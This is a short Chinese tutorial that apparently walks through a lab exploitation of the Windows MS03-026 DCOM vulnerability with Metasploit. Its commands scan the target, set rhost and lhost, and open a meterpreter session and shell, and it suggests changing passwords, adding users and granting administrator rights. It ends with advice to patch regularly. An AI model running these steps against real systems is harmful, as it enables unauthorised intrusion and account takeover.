windows漏洞MS03_026

话不多说，直接进入正题

第一步查看是否能ping通，第二步就是扫描端口，开放了端口才能进行攻击

linux进入msfconsole，搜索03_026

search 03_026

等待一会，返回漏洞的全名，exploit是一个攻击模块

接下来就是使用这个漏洞（在linux里复制快捷键是ctrl+shift+c，粘贴快捷键是ctrl+shift+v，这样就不用按鼠标右键点）

use exploit/windows/dcerpc/ms03_026_dcom

 显示需要配置的信息，条件

show options

只要是required一栏里，有yes的，都是必填项，第一行填的就是靶机的ip地址

set rhost 192.168.x.x

这时在设置一下攻击机的ip

set lhost 192.168.x.x

 设置完毕后，就可以进行攻击了，可用exploit或者run进行，一般都是用exploit

exploit

这时前缀就不是msf了

已经变成meterpreter，这时候输入shell

就进入到靶机的cmd里

查看用户

linux查看

windows查看

可以看到，用户都是一样的，所以我们可以进行更改用户密码，还可以新建新的用户，并且还可以把普通用户提升为超级管理员

 受到03_026影响的系统有

虽然受影响的系统都很老了，我们已经用不到了，但在现在的新系统又会有新的漏洞，只是还没有给发现，所以还是需要在日常生活中多去注意计算机的安全，要一周打一次补丁，否则哪天自己的计算机就遭殃了。